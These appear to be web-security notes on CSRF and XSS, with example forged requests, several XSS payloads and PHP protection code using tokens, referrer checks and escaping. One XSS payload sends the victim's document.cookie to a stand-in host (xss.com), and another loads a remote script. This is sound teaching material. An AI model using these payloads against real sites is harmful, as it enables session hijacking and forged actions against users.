Cross-Site Request Forgeries (CSRF)

Definition: http://en.wikipedia.org/wiki/Cross-site_request_forgery

Example:

<img src="http://csrf.com/logout?confirm=true">

<body onload="$('form').submit()">
<form action="http://csrf.com/" method="post">
<input name="confirm" value="true" />
</form>
</body>

Protection:
– Check the referrer
– Insert a token into the form, and store the token and its token_time in the session
– Insert the cookie value into the form via JS (a cross-origin XMLHttpRequest cannot read the cookies)
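The first two protections from the list, a referrer check plus a session-stored token with an expiry time, as an added PHP example (not code from the original notes). It assumes PHP sessions are in use, takes the page's own http://csrf.com as the trusted origin, and the 15-minute token lifetime and the function names are illustrative choices:

```php
<?php
// Added example: synchronizer-token CSRF protection (not from the original notes).
// Assumes PHP sessions; the TTL, origin and function names are illustrative.
declare(strict_types=1);

const CSRF_TOKEN_TTL = 900;            // assumed lifetime of a token, in seconds
const CSRF_ORIGIN    = 'http://csrf.com'; // the page's example host, used for the referrer check

function csrf_token(): string {
    // Issue a fresh random token when none exists or the stored one has expired,
    // and record token_time so the server can reject stale tokens later.
    $issued = $_SESSION['token_time'] ?? 0;
    if (empty($_SESSION['token']) || time() - $issued > CSRF_TOKEN_TTL) {
        $_SESSION['token']      = bin2hex(random_bytes(32));
        $_SESSION['token_time'] = time();
    }
    return $_SESSION['token'];
}

function csrf_field(): string {
    // Hidden input to embed in every state-changing form; escaped for the attribute context.
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

function csrf_valid(array $post, array $session, array $server): bool {
    // 1. Referrer check: if the browser sent a Referer, it must point at our own origin.
    //    (A missing Referer is tolerated here; a stricter site may reject it too.)
    if (isset($server['HTTP_REFERER'])
        && strpos($server['HTTP_REFERER'], CSRF_ORIGIN . '/') !== 0) {
        return false;
    }
    // 2. The token must be present in both the form and the session and must not have expired.
    $sent   = $post['token'] ?? '';
    $stored = $session['token'] ?? '';
    $issued = $session['token_time'] ?? 0;
    if ($sent === '' || $stored === '' || time() - $issued > CSRF_TOKEN_TTL) {
        return false;
    }
    // 3. Constant-time comparison so the check does not leak timing information.
    return hash_equals($stored, $sent);
}

session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST, $_SESSION, $_SERVER)) {
        http_response_code(403);
        exit('Invalid or expired CSRF token');
    }
    // Rotate the token after a successful check so each one is single-use.
    unset($_SESSION['token'], $_SESSION['token_time']);
    // ... perform the state change (e.g. the logout) here ...
}
?>
<form action="/logout" method="post">
  <?= csrf_field() ?>
  <input type="hidden" name="confirm" value="true" />
  <button type="submit">Log out</button>
</form>
```

The forged requests shown above fail this check because a third-party page can neither read the token out of the victim's session nor supply a Referer on the protected origin; the expiry bound on token_time also limits how long a leaked token remains usable.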

Cross Site Scripting (XSS)

Definition: http://en.wikipedia.org/wiki/Cross-site_scripting

XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.

Example:

<?php echo $_POST['name']; ?>

Examples of XSS exploits:

<script>alert('xss')</script>

<script>new Image().src='http://xss.com/xss.php?cookies='+encodeURI(document.cookie)</script>

<script src="http://xss.com/xss.js"></script>

Protection:

– Validate the input

– Escape the input / output

<?php echo htmlentities($_POST['name'], ENT_QUOTES, 'UTF-8'); ?>

– Only accept the session cookie from the same IP address it was issued to
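The validate-then-escape protections from the list, carried through for the contexts a value like $_POST['name'] typically lands in, as an added PHP example (not code from the original notes). The htmlentities call is the one from the notes; the JavaScript and URL escapers, the allow-list for the name, and the HttpOnly cookie flag (which keeps document.cookie out of reach of the cookie-stealing payload shown above) are standard additions not listed on the page, and the function names are illustrative:

```php
<?php
// Added example: input validation and context-aware output escaping (not from the original notes).
// Function names are illustrative; the name allow-list is an assumed policy.
declare(strict_types=1);

// Validate: a display name is limited to letters, digits, space, dot, apostrophe and hyphen, 1-64 chars.
function valid_name(string $name): bool {
    return (bool) preg_match('/^[\p{L}\p{N} .\'-]{1,64}\z/u', $name);
}

// Escape for HTML text and quoted attribute contexts (the htmlentities call from the notes,
// plus ENT_SUBSTITUTE so invalid UTF-8 is replaced instead of producing an empty string).
function e_html(string $s): string {
    return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Escape for a JavaScript string literal inside <script>: JSON-encode with the flags that
// hex-escape <, >, &, ' and ", so "</script>" in the data cannot break out of the block.
function e_js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
}

// Escape for a single URL query-string component.
function e_url(string $s): string {
    return rawurlencode($s);
}

// Mark the session cookie HttpOnly (and Secure) before the session starts, so scripts
// injected into the page cannot read it via document.cookie.
session_set_cookie_params(['httponly' => true, 'secure' => true]);
session_start();

$name = $_POST['name'] ?? '';
if (!valid_name($name)) {
    http_response_code(400);
    exit('Invalid name');
}
?>
<!-- HTML text context -->
<p>Hello, <?= e_html($name) ?></p>

<!-- Attribute context: the attribute must be quoted AND the value escaped -->
<input name="name" value="<?= e_html($name) ?>" />

<!-- JavaScript context: never drop raw or HTML-escaped text into a script -->
<script>var name = <?= e_js($name) ?>;</script>

<!-- URL context -->
<a href="/profile?name=<?= e_url($name) ?>">Profile</a>
```

Validation narrows what reaches the application, but it is the escaping matched to each output context that actually prevents the payloads listed above from being interpreted as markup or script; one escaper does not fit all contexts, which is why the HTML, JavaScript and URL cases each get their own.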